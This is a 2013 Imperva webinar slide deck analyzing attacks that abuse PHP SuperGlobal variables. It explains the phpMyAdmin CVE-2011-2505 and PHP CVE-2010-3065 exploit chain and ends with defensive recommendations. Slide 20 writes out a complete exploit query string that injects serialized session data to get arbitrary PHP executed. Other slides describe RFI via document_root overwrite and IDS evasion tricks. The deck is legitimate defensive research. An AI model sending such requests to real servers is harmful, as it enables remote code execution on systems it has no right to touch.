More Related Content Similar to PHP SuperGlobals: Supersized Trouble (20) PHP SuperGlobals: Supersized Trouble1. © 2013 Imperva, Inc. All rights reserved.
PHP SuperGlobals: Supersized Trouble
Confidential1
Tal Be’ery, Web Security Research Team Leader
2. © 2013 Imperva, Inc. All rights reserved.
Agenda
Confidential2
§ Introduction
• Relevant PHP background
§ An anatomy of a modern web exploit
• Abusing SuperGlobals
§ Additional PHP SuperGlobal attacks
• In the wild
§ Summary & conclusions
§ Q&A
3. © 2013 Imperva, Inc. All rights reserved.
HII Reports
Confidential3
§ Hacker Intelligence Initiative is focused at
understanding how attackers are operating in practice
• A different approach from vulnerability research
§ Data set composition
• ~60 real world applications
• Anonymous Proxies
§ More than 24 months of data
§ Powerful analysis system
• Combines analytic tools with drill down capabilities
4. © 2013 Imperva, Inc. All rights reserved.
Tal Be’ery,Web Research Team Leader
Confidential4
§ Web Security Research Team Leader at Imperva
§ Holds MSc & BSc degree in CS/EE from TAU
§ 10+ years of experience in IS domain
§ Facebook “white hat”
§ Speaker at RSA, BlackHat, AusCERT
§ Columnist for securityweek.com
§ CISSP
5. © 2013 Imperva, Inc. All rights reserved.
Introduction
Confidential5
Relevant PHP Background
6. © 2013 Imperva, Inc. All rights reserved.
§ The most popular server-side programming language in
the world:
§ And goes from strength to strength
Breadth and Depth of PHP - I
Confidential6
7. © 2013 Imperva, Inc. All rights reserved.
§ The most popular web applications are powered by PHP
Breadth and Depth of PHP – II
http://www.alexa.com/topsites
Confidential7
8. © 2013 Imperva, Inc. All rights reserved.
PHP SuperGlobals
Confidential8
§ Most programing languages support different scopes for
variables, primarily the “local” and the “global” scope.
§ Global variables
• Provide a simple channel for cross-function communication
• More risky, as *ANY* function may change them
§ PHP has several predefined variables that are called
SuperGlobals.
§ SuperGlobals provide access to the server’s core
functionality – cookies, sessions, environment, etc.
§ SuperGlobals variables are available to the PHP script
in all scopes, with no need for explicit declaration.
9. © 2013 Imperva, Inc. All rights reserved.
PHP SuperGlobal List
Confidential9
Variable
Definition
1
GLOBALS
References all variables
available in global scope
2
_SERVER
Server and execution
environment information
3
_GET
HTTP GET variables
4
_POST
HTTP POST variables
5
_FILES
HTTP File upload variables
6
_COOKIE
HTTP Cookies
7
_SESSION
Session variables
8
_REQUEST
HTTP Request variables
9
_ENV
Environment variables
10. © 2013 Imperva, Inc. All rights reserved.
External Variable Modification: A PHP
Specific Weakness
Confidential10
§ MITRE had assigned a specific CWE (Common
Weakness Enumeration) code for the External Variable
Modification weakness: CWE-473
§ “A PHP application does not properly protect against the
modification of variables from external sources, such as
query parameters or cookies”.
§ SuperGlobals are a natural target:
• Exist in every PHP application
• Provide access to the server’s core functionality
11. © 2013 Imperva, Inc. All rights reserved.
Anatomy of a Modern Web Exploit
Confidential11
Exploiting SuperGlobals
12. © 2013 Imperva, Inc. All rights reserved.
PHPMyAdmin (PMA)
Confidential12
§ The most popular MySQL administration tool for PHP
§ Often is bundled by default in LAMP (Linux, Apache,
MySQL, PHP) installations
13. © 2013 Imperva, Inc. All rights reserved.
CVE-2011-2505: PhpMyAdmin Vulnerability
Confidential13
§ PhpMyAdmin’s Unset session functionality
§ Parse_str() : parses the given query string and stores the
variables in the current scope. As a result, *ALL* request
variables are imported into the function’s local scope.
§ Session_write_close(): Makes Session data persistent
throughout the entire user’s session. Session data is
implicitly written to a local file on the server.
14. © 2013 Imperva, Inc. All rights reserved.
CVE-2011-2505: Exploit
Confidential14
§ An attacker can now
• Craft a malicious query string with the _SESSION SuperGlobal
• Injected _SESSION value overrides the session’s original values
• New values are saved to local file
15. © 2013 Imperva, Inc. All rights reserved.
Serialization Explained
Confidential15
§ The process of saving data stored in memory to file is
called “serialization”
§ The process of loading data stored in file to memory is
called “deserialization”
Source: http://www.studytonight.com/java/images/Serialization-deserialization.JPG
16. © 2013 Imperva, Inc. All rights reserved.
§ Discovered by Stefan Esser - Late 2010
§ Attacker can write data to the session in
*ANY* format, if the session variable name
starts with ‘!’
CVE-2010-3065 PHP Vulnerability & Exploit
Confidential16
17. © 2013 Imperva, Inc. All rights reserved.
PMA Session Deserialization: Vulnerability
Confidential17
§ On session deserialization, the load() function is called
§ Eval is evil!
• Can be used to execute unexpected code
§ But in order to exploit, attackers need to first specify a
valid source (= session filename )
18. © 2013 Imperva, Inc. All rights reserved.
Guessing Session Filename: Theory
Confidential18
§ Luckily for the attacker, the location of the session file is
predictable
§ Session file name consists of
• The “sess_” prefix
• The session identifier – known to the user/attacker
§ File’s path is predictable
• default values
19. © 2013 Imperva, Inc. All rights reserved.
Guessing Session Filename: In the Wild
Confidential19
§ Multiple guesses for path the same session file
(“sess_19qq…”)
20. © 2013 Imperva, Inc. All rights reserved.
The Final Exploit
Confidential20
§ Now the attackers can, *FINALLY*, get their code
evaluated
§ /phpMyAdmin/index.php?session_to_unset=123&
token=86498ff0a666f808df76ffaabee9b7a3&
_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:
{s:6:“source";s:59:"/var/lib/php5/
sess_6a3e0376fbfe9797081a
3ee202ef1ca85c451a62";}}&
_SESSION[payload]=<?php phpinfo(); ?>
21. © 2013 Imperva, Inc. All rights reserved.
Exploit Result
Confidential21
§ Arbitrary PHP code is executed
22. © 2013 Imperva, Inc. All rights reserved.
PMA SuperGlobal Attacks In the Wild
Confidential22
§ Attacks source is a hacked server
§ Attacks (at least) two other servers
§ Attacks persist over half a year
23. © 2013 Imperva, Inc. All rights reserved.
A Modern Exploit Summary: Research
Confidential23
§ Sophisticated research
§ Combines multiple vulnerabilities and issues in multiple
domains
• PHPMyAdmin (PMA)
• PHP internals
24. © 2013 Imperva, Inc. All rights reserved.
A Modern Exploit Summary: Development
Confidential24
§ Exploit packed in a single, “click once” PHP script
§ Automates the different attack stages
§ Can be launched from infected servers to infect others
25. © 2013 Imperva, Inc. All rights reserved.
Additional PHP SuperGlobal Attacks
Confidential25
In the Wild
26. © 2013 Imperva, Inc. All rights reserved.
SuperGlobal Attacks Targets – I
Confidential26
§ Specific vulnerabilities exploit – such as the previously
discussed PMA attack
§ RFI (Remote File Inclusion): trying to overwrite
“Server[document_root]” to point to external resource
27. © 2013 Imperva, Inc. All rights reserved.
SuperGlobal Attacks Targets – II
Confidential27
§ Part of general scanning against the site – Nikto,
Acunetix, Nessus
§ IDS filter evasion: SuperGlobal Provide an alternative
way to represent HTTP query parameters
• “_REQUEST[Itemid]=1” request parameter is equivalent to
“Itemid=1” in every way
• However, it evades a naïve IDS signature that blacklists
“Itemid=1”
• We have seen these evasion technique applied on several CVEs
28. © 2013 Imperva, Inc. All rights reserved.
SuperGlobals In the Wild
Confidential28
§ During May 2013:
§ 3.5K requests that manipulated PHP SuperGlobal
variables.
§ 27 different attack sources
§ 24 web applications as targets
29. © 2013 Imperva, Inc. All rights reserved.
Targeted SuperGlobal
Confidential29
§ Some SuperGlobals are more targeted than others
§ The more targeted SuperGlobals provide access to more
sensitive resources
GLOBALS
55%
ENV
14%
SERVER
14%
SESSION
13%
REQUEST
4%
30. © 2013 Imperva, Inc. All rights reserved.
Summary & Conclusions
Confidential30
31. © 2013 Imperva, Inc. All rights reserved.
The Importance of a Positive Security Model
Confidential31
§ The essence of the external variable manipulation
weakness: the attacker has the ability to send out
external parameters with the same name of internal
variables, and thus override the value of the latter.
§ External parameters are not part of the standard interface
of the targeted application
§ Blocking all of the internal variables’ names might be
difficult with a negative security approach
§ But trivial with a positive security mechanism that
specifies the allowed parameter names for each resource
32. © 2013 Imperva, Inc. All rights reserved.
Layered Application Layer Mechanisms
Confidential32
§ Bad news: attackers can create a complex exploit by
combining several vulnerabilities together
§ Good news: it’s enough to break one of the links in the kill
chain to break the chain altogether .
§ Application layer solution that combines multiple
detection mechanisms:
• Positive security model
• Negative security model for generic issues (generic directory
traversal protection for this case)
• Specific CVE detection, is crucial for effective mitigations of such
complex attacks.
33. © 2013 Imperva, Inc. All rights reserved.
Third-Party Code Perils
Confidential33
§ Attackers target popular applications such as the
PhpMyAdmin (PMA) utility installation.
§ PMA is often bundled with other applications.
§ Having this vulnerable utility present on the server, even
if it is not being used, exposes the server to code
execution attacks.
§ Since administrators are not necessarily aware of all the
bundled software, an “opt out” security model is needed.
§ A way to achieve such an “opt out” security model is by
deploying a Web Application Firewall (WAF) with
constant updates of security content.
34. © 2013 Imperva, Inc. All rights reserved.
SuperGlobal Parameters In Requests
Should Be Blocked
Confidential34
§ There is no reason for these parameters to be present in
valid requests, they should be banned.
§ Imperva’s WAF customers received a content update to
their Web Application Firewall on January 15th 2013.
35. © 2013 Imperva, Inc. All rights reserved.
Summing Up
Confidential35
§ Establish a positive security model
§ Use layered application layer security mechanisms
§ Beware of third-party code perils
§ Block SuperGlobal parameters in requests
36. © 2013 Imperva, Inc. All rights reserved.
Webinar Materials
Confidential36
Post-Webinar
Discussions
Answers to
Attendee
Questions
Webinar
Recording Link
Join Group
Join Imperva LinkedIn Group,
Imperva Data Security Direct, for…
37. © 2013 Imperva, Inc. All rights reserved.
www.imperva.com
Confidential37